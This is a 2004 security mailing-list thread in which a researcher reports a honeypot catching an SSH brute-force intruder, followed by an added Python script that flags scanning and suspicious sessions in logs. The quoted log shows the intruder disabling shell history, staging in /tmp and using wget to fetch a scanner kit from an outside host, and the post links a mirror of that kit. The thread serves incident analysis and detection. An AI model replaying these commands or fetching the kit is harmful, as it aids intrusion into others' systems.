Incidents
FW: [Intrusions] Linux SSH scanning - test/guest Jul 30 2004 11:22AM
M Shirk (shirkdog_linux hotmail com) (1 replies)
Re: FW: [Intrusions] Linux SSH scanning - test/guest Sep 08 2004 12:51AM
Sebastian Jaenicke (sjaenick TechFak Uni-Bielefeld DE) (1 replies)
Hi,

On Fri, Jul 30, 2004 at 07:22:45AM -0400, M Shirk wrote:
[..]
> There is also a multithreaded SSH bruteforcer called "haita"
> This attempts to login to machines using the accounts "test" and "guest",
> with passwords "test" & "guest" respectively. It runs from a file
> of addresses found by a synscan program. It identifies itself as
> SSH-2.0-libssh-0.1
>
> So, SSH login failures for test & guest are an indication of this
> thing running at the remote end.
>
> The two names & passwords appear to be hardcoded into the program.
> Since Linux as I recall backs off after failed attempts there wouldn't be
> much to gain by trying many more names, but variants may appear with other
> defaults.

I just set up an account "guest" with password "guest" and a shell modified
to log commands via syslog[0].

Sep 8 02:08:45 azathoth sshd[5890]: Accepted password for guest from 218.25.120.5 port 2952 ssh2
Sep 8 02:11:24 azathoth sshd[5914]: Accepted password for guest from 82.77.67.250 port 1173 ssh2
Sep 8 02:11:29 localhost T=2004-09-08__02:11:29 PI=5917 UI=1007 w
Sep 8 02:11:45 localhost T=2004-09-08__02:11:45 PI=5917 UI=1007 unset HISTFILE ; unset HISTSAVE
Sep 8 02:12:10 localhost T=2004-09-08__02:12:10 PI=5917 UI=1007 mkdir /tmp/PS
Sep 8 02:12:17 localhost T=2004-09-08__02:12:17 PI=5917 UI=1007 cd /tmp/PS
Sep 8 02:12:23 localhost T=2004-09-08__02:12:23 PI=5917 UI=1007 ls -a
Sep 8 02:12:42 localhost T=2004-09-08__02:12:42 PI=5917 UI=1007 wget memphis.freehttp.com/69
Sep 8 02:13:24 localhost T=2004-09-08__02:13:24 PI=5917 UI=1007 kill -9 0

(All timestamps are MEST).

Timestamps suggest all commands were typed in by hand; no
attempt was made to compromise the target system.

# file /tmp/PS/69
/tmp/PS/69: gzip compressed data, from Unix
# tar tzvf /tmp/PS/69
drwxr-xr-x root/root 0 2004-07-12 20:10 ssh/
-rwxr-xr-x root/root 453972 2004-07-12 20:09 ssh/ss
-rwxr-xr-x root/root 1365263 2004-07-12 20:10 ssh/sshf
-rwxr-xr-x root/root 85 2004-07-12 20:10 ssh/go.sh

'ss' is a simple port scanner used to find other systems
running an ssh server; running 'strings' on it suggests it's
this one: [1]

'sshf' is then used to try logging onto the systems using
test/test and guest/guest (seems to be hardcoded).

I've mirrored '69' at [2], just in case someone wants to
take a closer look.

- Sebastian

[0] http://www.honeynet.org/tools/dcapture/bash-perassi.patch
[1] http://www.securiteam.com/tools/5EP0B0ADFO.html
[2] http://www.jaenicke.org/misc/69
--
Sebastian Jaenicke Disce aut discede!
whois pgpkey-C81115B1 -h whois.ripe.net|perl -ne's-^certif: *--&&print'

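The post above gives a defender two detection signals: repeated sshd failures for the "test" and "guest" accounts from one source (the scanner at work), and, once a default account is accepted, a command-logging shell showing history being disabled, staging under /tmp and a download. The following script is an added example written for this page, not code from the post or from the honeynet patch it cites; it parses both kinds of syslog line (formats modelled on those quoted above), correlates shell command lines with the most recent accepted login for the same user, and reports scanner sources and suspicious sessions. The uid-to-user mapping, the failure threshold, the indicator patterns and the sample log lines (RFC 5737 addresses, an `example.invalid` host) are all constructed assumptions for the example.

```python
"""Added example: flag default-account scanning and post-login activity
from sshd auth lines plus a command-logging shell's syslog lines."""
import re
from collections import Counter

# Constructed sample input, modelled on the log format in the post
# (addresses and download host are placeholders, not the post's values).
SAMPLE_LOG = """\
Sep  8 02:05:01 azathoth sshd[5801]: Failed password for test from 203.0.113.7 port 40120 ssh2
Sep  8 02:05:03 azathoth sshd[5803]: Failed password for guest from 203.0.113.7 port 40122 ssh2
Sep  8 02:08:45 azathoth sshd[5890]: Accepted password for guest from 203.0.113.7 port 2952 ssh2
Sep  8 02:11:29 localhost T=2004-09-08__02:11:29 PI=5917 UI=1007 w
Sep  8 02:11:45 localhost T=2004-09-08__02:11:45 PI=5917 UI=1007 unset HISTFILE ; unset HISTSAVE
Sep  8 02:12:10 localhost T=2004-09-08__02:12:10 PI=5917 UI=1007 mkdir /tmp/PS
Sep  8 02:12:17 localhost T=2004-09-08__02:12:17 PI=5917 UI=1007 cd /tmp/PS
Sep  8 02:12:42 localhost T=2004-09-08__02:12:42 PI=5917 UI=1007 wget example.invalid/69
Sep  8 02:13:24 localhost T=2004-09-08__02:13:24 PI=5917 UI=1007 kill -9 0
Sep  8 03:00:00 azathoth sshd[6010]: Accepted publickey for alice from 198.51.100.4 port 5022 ssh2
Sep  8 03:00:10 localhost T=2004-09-08__03:00:10 PI=6015 UI=1000 ls -l
"""

ACCEPTED_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+)")
FAILED_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Failed (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+)")
# Lines emitted by the command-logging shell: T=<time> PI=<pid> UI=<uid> <command>
CMD_RE = re.compile(r"T=(?P<ts>\S+) PI=(?P<pid>\d+) UI=(?P<uid>\d+) (?P<cmd>.*)$")

WATCHED_ACCOUNTS = {"test", "guest"}       # default accounts the scanner tries
FAIL_THRESHOLD = 2                         # assumed: failures per source before flagging
UID_TO_USER = {1007: "guest", 1000: "alice"}  # assumed mapping (would come from /etc/passwd)

# Post-login behaviours worth alerting on, in the order they are checked.
INDICATORS = [
    ("history_disabled", re.compile(r"unset\s+HIST|HISTFILE=/dev/null|HISTSIZE=0")),
    ("tmp_staging", re.compile(r"(mkdir|cd)\s+/(tmp|var/tmp|dev/shm)")),
    ("remote_download", re.compile(r"\b(wget|curl|ftp|lynx)\b")),
    ("archive_unpack", re.compile(r"\btar\s+\S*x")),
]


def parse_line(line):
    """Classify one syslog line as ('login'|'failed'|'cmd', fields) or None."""
    for kind, rx in (("login", ACCEPTED_RE), ("failed", FAILED_RE), ("cmd", CMD_RE)):
        m = rx.search(line)
        if m:
            return kind, m.groupdict()
    return None


def analyse(log_text):
    """Return scanner sources, every login session, and the sessions worth alerting on."""
    failed = Counter()      # source ip -> failures against watched accounts
    sessions = []           # one record per accepted login, in log order
    latest_by_user = {}     # user -> index of that user's most recent session
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        kind, f = parsed
        if kind == "failed":
            if f["user"] in WATCHED_ACCOUNTS:
                failed[f["ip"]] += 1
        elif kind == "login":
            sessions.append({"user": f["user"], "ip": f["ip"],
                             "watched": f["user"] in WATCHED_ACCOUNTS,
                             "commands": [], "indicators": []})
            latest_by_user[f["user"]] = len(sessions) - 1
        else:
            # The shell logs the uid, not the sshd pid, so correlate via the
            # uid -> user mapping and the user's most recent accepted login.
            idx = latest_by_user.get(UID_TO_USER.get(int(f["uid"])))
            if idx is None:
                continue
            session = sessions[idx]
            session["commands"].append(f["cmd"])
            for name, rx in INDICATORS:
                if rx.search(f["cmd"]) and name not in session["indicators"]:
                    session["indicators"].append(name)
    scanners = sorted(ip for ip, n in failed.items() if n >= FAIL_THRESHOLD)
    alerts = [s for s in sessions if s["watched"] or s["indicators"]]
    return {"scanners": scanners, "sessions": sessions, "alerts": alerts}


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    print("scanner sources:", report["scanners"])
    for s in report["alerts"]:
        print(f"ALERT {s['user']}@{s['ip']}: {len(s['commands'])} commands, "
              f"indicators={s['indicators']}")
```

Matching on the uid is the key design choice: the shell's PI= field is the shell's own pid, not the sshd child pid, so the only field both record types share is the user. On a real host the uid mapping comes from the account database rather than a constant, and the `watched` set would be extended with whatever other default accounts the local variants of the scanner try.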
Re: FW: [Intrusions] Linux SSH scanning - test/guest Sep 12 2004 02:50PM
Sebastian Jaenicke (sjaenick TechFak Uni-Bielefeld DE) (1 replies)
Re: FW: [Intrusions] Linux SSH scanning - test/guest Sep 13 2004 04:40PM
Christine Kronberg (Christine_Kronberg genua de)
Copyright 2010, SecurityFocus